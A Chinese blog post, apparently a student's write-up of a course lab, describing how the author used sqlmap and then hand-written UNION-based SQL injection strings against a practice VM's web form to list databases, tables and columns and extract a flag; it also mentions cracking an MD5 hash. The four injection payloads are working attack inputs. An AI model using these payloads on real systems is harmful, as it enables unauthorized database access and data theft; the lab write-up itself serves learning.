系统安全实验——Web表单SQL注入

已于 2023-04-12 22:04:01 修改
阅读量716 收藏 4
点赞数 3
文章标签: sql 数据库
于 2023-04-12 22:01:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/IT_GIRL_XYX/article/details/130113005
版权
作者通过使用sqlmap工具尝试SQL注入,最初以为flag在user表的password字段,但解密后发现错误。在他人提示下,尝试了Web表单注入,最终在databaseqwerty的table23335中找到名为pwd88s的列,该列内容即为flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目要求

打开浏览器,进入靶机ip对应的网页,对其后台的数据库进行注入攻击,得到flag

摸索过程

sqlmap

一开始搜索的都是“SQL注入”,答案一般都需要工具sqlmap。

下载安装后,根据一些基本SQL注入语句,查看了qwerty中的user表,里面有user_id,user_name和password。

根据以往的实验来讲,一般flag就是password嘛,拿到这一串东西:

bcbe3365e6ac95ea2c0343a2395834dd 

我还用md5解密得到222.

但是,答案错误!

到底是哪里出问题了呢?一个多小时的摸索在这里停滞,不知如何是好。

Web表单注入

在助教老师和同学的提点下,换一个关键词搜索。搜到了这篇文章,感觉非常对口。

web 漏洞入门之 —— SQL 注入教程_实验楼v的博客-优快云博客

从数据库-table-column一步步走下去,诶?怎么还是这个md5串?!

1'+union+select+password+from+user 

崩溃!跟蓝朋友出去吃了个《食古论今》啃完猪蹄后回来继续做。

重整思路

也许flag根本就不是user的password。又想起来qwerty数据库里除了user还有一个奇怪的名字table23335,当时因为注意力全被user吸引,就没注意它。

实验步骤

进入靶机网页后,再输入栏中输入:

1.查所有数据库

-1' union select schema_name from information_schema.SCHEMATA#

那两个带schema的应该是sql自带的配置不用管,我也进mysql看了一下,没有什么有价值的东西,所以正确答案一定还在qwerty里!

2.查qwerty数据库所有表

-1' union select table_name from information_schema.tables where table_schema="qwerty"#

 3.查table23335的所有列

-1' union select column_name from information_schema.columns where table_name="table23335"#

这时候我恍然大悟。这个pwd88s与题目的提示“pwdxxx”很像呀!就是它! 

4.看pwd88s的内容

 -1' union select pwd88s from qwerty.table23335#

 啊!这小串数字太亲切啦!它就是flag!

总结与反思

所以其实sqlmap的方法也是可用的,甚至打的字可能还少一些。只要选对了表!!!

以后不要想当然,要广撒网。

做不出来就去啃个猪蹄儿!

IT_GIRL_XAH
关注
Error: Cannot find modulenode:url‘【已解决】
JavaPub
03-13 755
建议直接用终极解决办法,升级 node 版本。
vue3 - 报错error when starting dev serve: Error: Cannot find modulenode:url‘(完美解决方法)
高级前端工程师
02-28 6038
vue3,vite,运行项目报错,npm run dev,vue3启动报错,vue3 Error: Cannot find module 'node:url',vue3 error when starting dev serve,vue3 Failed to load config from 'xx',报错解决方法,vue3如何解决运行出现报错,vue3安装依赖后运行报错如何解决,怎么处理vue3运行报错提示,vue报错,解决报错,终端提示错误,浏览器报错,在VUE3+vite项目run dev运行起不来报
vue3项目:Error: Cannot find modulenode:url
Bruce__taotao的博客
03-12 1879
今天下载一个项目是vue3+ts+vite 的。我的电脑是mac ,之前也成功运行过vue3与vue2的项目。今天却报错了,这里记录下📝。记录下vue3+ts 环境报错处理问题。
Cannot find modulenode:url‘报错处理
weixin_44161385的博客
12-05 1144
在运行vite搭建的项目时,遇到Cannot find module 'node:url'报错是因为node版本导致
npm run dev 报错Cannot find modulenode:url
qq_47302320的博客
01-26 2536
vue3.0
解决Error: Cannot find modulenode:url‘,及Network:use --host to expose无法通过网络IP访问服务
weixin_42627850的博客
03-03 3603
解决Error: Cannot find module 'node:url'问题(使用nvm),及Network:use --host to expose无法通过网络IP访问服务问题
Error: Cannot find modulenode:url‘【亲测可用】
weixin_45523960的博客
02-05 5318
运行npm run dev报错
npm run dev报错 Module build failed: Error: Cannot find modulenode-sass’
01-08
 这时你可以去项目依赖node_module里边去找一下 ,发现确实没有这个包,那就重新装一下吧 npm install node-sass –save   就迎来这种报错,这个node-sass包应该是在国外的站点上,拉取过程中非常容易失败,中间...
nuxt服务端渲染,用create-nuxt-app脚手架创建NuxtJS应用,报错 Cannot find modulenode:util‘解决
花椒和蕊的博客
04-08 589
因为node版本不匹配,我本地是14.5.0,我改成16.12.0,再重新npm run dev 项目可以正常运行。手动配置可以实现更多自己想要的,更自由一些。但是完整的实现非常复杂,官方建议使用nuxt,开箱即用。4、遇到报错: Cannot find modulenode:util’vue文档中提到,可以直接通过配置,在vue的项目中准备 SSR 应用程序。安装成功,访问 http://localhost:3000/即可。2、使用nuxt创建项目。3、创建好之后运行项目。
运行vue3报错Error: Cannot find modulenode:url‘解决
mirage_dw的博客
08-07 2万+
运行vue3+vite项目报错Error: Cannot find module 'node:url'解决
vue3.0运行npm run dev 报错Cannot find modulenode:url
前进者
08-23 1万+
vue3.0运行npm run dev 报错Cannot find module 'node:url',安装node版本等于或者大于15.0.0版本,然后npm run dev即可
vue启动项目报错Cannot find modulenodeurl‘解决
04-04 1060
这是由于 vue3 工程依赖的 node 版本比较高所导致的,可以先使用 nvm 来安装高版本的 node,再使用 nvm use 切换到高版本,再运行命令。本次安装版本 18.15.0,使用命令。查看当前 node 版本。就可以把项目跑起来。
npm run dev Error:Cannot find modulenode:url
weixin_44216637的博客
02-24 843
npm run dev Error:Cannot find module 'node:url' 2. 升级到指定版本 sudo n 14.18.0 3. node -v 查看版本
vue3.0运行npm run dev 报错Cannot find module node:url
baorant24的博客
10-25 1916
vue3.0运行npm run dev 报错Cannot find module
Vue3】vue3.0运行npm run dev 报错Cannot find modulenode:url或者import { performance } from ‘node:perf_hoo
SunPeng的博客
02-01 1569
Vue3】vue3.0运行npm run dev 报错Cannot find modulenode:url;import { performance } from ‘node:perf_hook’,SyntaxError: Cannot use import statement outside a module
关于node下载的模块无法使用(Cannot find module)解决方法
热门推荐
词庸
08-02 6万+
这个问题困扰了我很久,也按百度上各式各样的方法试了没有用 今天和导师远程,知道了问题在哪,我用webstorm编译器进行演示 若使用其他编译器,可按下述原理进行修改 原理(在当前工程文件夹下要有一个package.json文件,并在此工程下安装npm模块,安装后会出现一个node_modules文件夹,里面包含着下载的模块) 过程: 测试代码: 此时运行,结果如下图, 显示
Module build failed: Error: Cannot find module 'url-loader' 的坑
weixin_30649641的博客
07-11 3407
本文地址:http://www.cnblogs.com/jying/p/8280956.html 开发环境:react、webpack、es5 引用图片报错:Module build failed: Error: Cannot find module 'url-loader' react中对于相对路径图片的引用,使用require <img src={require("...
解决鸿蒙开发中的编译错误:“Cannot find module
qq_14863717的博客
06-13 4259
通过这次经历,我学到了在遇到编译错误时,除了检查代码和依赖之外,还应该考虑开发环境的完整性和配置。重新安装开发工具是一个简单但有效的解决策略,尤其是在环境和配置问题导致错误的情况下。在进行鸿蒙(HarmonyOS)应用开发时,我遇到了一个棘手的编译错误:“Cannot find module”。具体来说,当我尝试使用。这次解决问题的过程也提醒我,作为开发者,我们需要不断学习和适应,即使是面对看似复杂的错误,通过逐步分析和尝试,总能找到解决问题的方法。执行重新安装后,我再次尝试运行编译命令,这次成功了!
taro cannot find module node:path
最新发布
01-16
### 解决 Taro 项目中无法找到 `node:path` 模块的问题 在处理 Taro 项目的依赖问题时,如果遇到错误提示 "Cannot find module 'node:path'", 可能的原因之一是 Node.js 版本不兼容或者是由于某些环境配置不当引起的。 对于这个问题,在较新的Node版本中,部分核心模块如path被移至`node:`协议下。因此,当旧版Taro或其他依赖尝试直接引入`node:path`时可能会报错[^1]。为了修复此问题,可以采取以下几种方法: #### 方法一:更新 Taro 和相关依赖包到最新稳定版本 确保所使用的 Taro CLI 工具以及所有关联的 npm 包都是最新的稳定版本。可以通过执行如下命令来完成升级操作: ```bash npm install -g @tarojs/cli cd your-taro-project npm update ``` #### 方法二:降级 Node.js 至 LTS 版本 有时特定的大版本之间的变更可能导致一些库不再支持新特性或语法糖。考虑到这一点,切换回长期支持 (LTS) 的 Node.js 版本可能有助于解决问题。使用 nvm(Node Version Manager)工具可以帮助轻松管理多个 Node.js 版本共存于同一台机器上。 ```bash nvm install --lts nvm use lts ``` #### 方法三:修改 Webpack 配置文件排除 node_modules 中的路径解析 如果上述两种方式均未能有效解决该问题,则考虑调整 webpack.config.js 文件中的配置项,通过设置 alias 或者其他手段绕过对 `node:path` 的引用。具体实现取决于实际应用场景和个人偏好。 需要注意的是,以上建议基于一般情况下的解决方案;针对具体情况还需要进一步排查日志信息并分析根本原因所在。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值